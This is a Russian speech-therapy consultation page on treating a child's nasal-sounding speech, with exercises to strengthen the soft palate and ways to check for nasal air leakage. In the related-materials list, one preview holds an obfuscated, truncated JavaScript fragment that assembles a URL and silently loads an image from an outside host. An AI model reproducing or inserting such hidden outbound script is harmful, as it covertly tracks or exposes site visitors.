Что делать , если ребенок "гнусавит"?
консультация по логопедии на тему

Уважаемые педагоги и родители ! Очень часто на логопункте я встречаю детей , у которых нет  явных нарушений звукопроизношения, но  при этом ,их  речь  имеет  очень  сильный

носовой  оттенок . Предлагаю  вам  комплекс  упражнений  для устранения этого  дефекта.

Скачать:

ВложениеРазмер
Файл kak_izbavitsya_ot_gnusavost1.docx15.56 КБ

Предварительный просмотр:

            Как  избавиться  от  гнусавости ?

Почему  голос  звучит  гнусаво?

В  образовании  звуков  речи  помимо  других  органов (губы,язык и пр.) участвуют

также  резонаторы , влияющие  на качество  и  количество  произносимого  звука .

Основными  резонаторами  у  нас  выступают  носовая  и  ротовая  полости , причем ,

каждая  по отдельности  . То  есть , выдыхаемая  струя  воздуха , которая  образует

звук , выходит  либо  через  нос , либо  через  рот . В  русском  языке  носовой  резонатор

участвует  в  образовании  звуков М,Мь,Н,Нь. Все  остальные  звуки (и  гласные , и соглас-

ные ) образуются  с  помощью  ротового  резонатора . «Регулирует» прохождение  возду-

ха  через  ту  или  иную  полость  специальный  орган –«маленький  язычок»  или , по-ла-

тыни – uvula . Вы  можете  увидеть  его  в  зеркало , если  широко  раскроете  рот  и  про-

тянете  звук  А – «язычок»  свешивается  сверху  в  самой  глубине  рта .Когда  язычок  сво-

бодно  висит , мышцы  его  расслаблены , выдыхаемая  воздушная  струя  свободно  про –

ходит  из  легких  через  глотку  в  носовую  полость – получается  «носовой» звук .Если  же

мышцы «язычка» напряжены ,  он  поднимается  наверх  и  закрывает  собой  вход  в  по-

лость  носа . Струе  воздуха  ничего  не  остается , как  «повернуть» и  выходить  через  рот-

получается  «ротовой» звук .Таким  образом , при  правильной , не «гнусавой» речи,мыш-

цы «язычка» почти  всегда  должны  быть  напряжены (кроме  тех  моментов , когда  про-

износятся  звуки М,Мь,Н,Нь),а  сам  он  поднят  кверху .

  Упражнения  для  укрепления  мышц  мягкого  неба .

1.Глотание  воды  маленькими порциями , что  вызывает  максимально  высокое  подня –

тие  «язычка». При  следующих  друг  за  другом  глотательных  движениях  удлиняется

время  удержания  «язычка» в  поднятом  положении. Ребенку  предлагается  попить  из

маленького  стаканчика  или  пузырька .Можно  капать  на  язык  из  пипетки  по  несколь-

ку  капель  воды.

2.Позевывание  при  открытом  рте;  имитация позевывания .

3.Полоскание  горла  теплой  водой  маленькими  порциями .

4.Покашливание , которое  вызывает  энергичное  сокращение  мышц  на  задней  стен-

ке  глотки .При  покашливании  происходит  полный  затвор  между  носовой  и  ротовой

полостями .Активные  движения «язычка» и  задней  стенки  глотки  могут  ощущаться

ребенком  ( рука прикасается  к  шее  под  подбородком  и  чувствует  подъем  «язычка».

Произвольное  покашливание  производится  2-3  раза  на  одном  выдохе .В  это  время

сохраняется  контакт   «язычка»  с  задней  стенкой  глотки , а  воздушный  поток  направ-

ляется  через  ротовую  полость .Первое  время  рекомендуется  производить  покашли –

вание  с  высунутым  языком . Затем – покашливание  с  произвольными  паузами , во

время  которых  от  ребенка  требуют  сохранить  контакт  «язычка» с  задней  стенкой

глотки . Постепенно  ребенок  приучается  активно  поднимать  его  и  направлять  воздуш-

ную  струю  через  рот .

5.Четкое  и  энергичное  утрированное  произнесение  гласных  звуков высоким  тоном

голоса . При  этом  увеличивается  резонанс  в  ротовой  полости  и  уменьшается  носовой

оттенок .

     При  выполнении  упражнений  важно  постоянно  контролировать  ребенка , так  как  на  первых  порах  ему  трудно  будет  ощутить  утечку  воздуха  через  нос . Для  этого :

- приставляется  зеркальце  к  носовым  ходам  (не  ко  рту !), при  утечке  воздуха  через  нос  зеркальце  запотевает ;

- к  носовым  ходам  подносится  маленький  кусочек  ватки , ватка  отклоняется  при  утеч-

ке  воздуха  через  нос .

       Упражнения  хорошо  делать  по  многу  раз  в  день , но  не  дольше , чем  4-5 минут и

не  больше , чем  1-2  упражнения  за  раз .Сразу  после  упражнений  попросите  ребенка

повторить  за Вами  несколько  слов , коротких  фраз правильно , попробуйте  выучить  ко-

роткий  стишок . В дальнейшем  требуйте  правильного  произношения  этих  слов , фраз .

Через  некоторое  время  мышцы  окрепнут  и  ребенок  научится  контролировать  свою речь . 


По теме: методические разработки, презентации и конспекты

Что делать, если ребенок не желает делиться своими игрушками

Ребенок от года до двух лет может еще не понимать и не помнить правил поведения в группе детей, поэтому взрослые, прежде всего должны научить его, как следует общаться, взаимодействовать с...

Консультации для родителей(что делать если ребёнок ворует,если ребенок не слушается,«Воспитание дружеских отношений в игре»,Легко ли научить ребёнка правильно вести себя на дороге?)

На первый взгляд легко. Надо только познакомить его с основными требованиями Правил дорожного движения и никаких проблем.На самом деле очень трудно. Ведь мы, родители, каждый день на глазах родного ча...

ЧТО ДЕЛАТЬ, ЕСЛИ РЕБЕНОК НЕ ЖЕЛАЕТ ДЕЛИТЬСЯ СВОИМИ ИГРУШКАМИ С ДРУГИМИ ДЕТЬМИ?

Ребенок от года до полутора лет может еще не понимать и не помнить правил поведения в группе детей. Поэтому взрослые прежде всего должны научить его, как лучше общаться, взаимодействовать с окружающим...

Консультация для родителей «Что делать, если ребёнок не делится игрушками?»

Консультация для родителей «Что делать, если ребёнок не делится игрушками?» «Это моё!», «Отдай мне!», "Нет, не бери, это моё!" На детских площад...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Консультация для родителей «Что делать, если ребёнок не делится игрушками?»

Что делать , если ребёнок не делится игрушками с другими детьми? Почему так происходит, почему дети жадничают?...

Памятка родителям «Что делать и чего не делать, если ребенок сосет предметы или грызет ногти»

Памятка для педагогов и родителей«Что делать и чего не делать, если ребенок сосет предметы или грызет ногти» Сосание предметов Что нужно делать?Чего делать нельзя? 1. Наполн...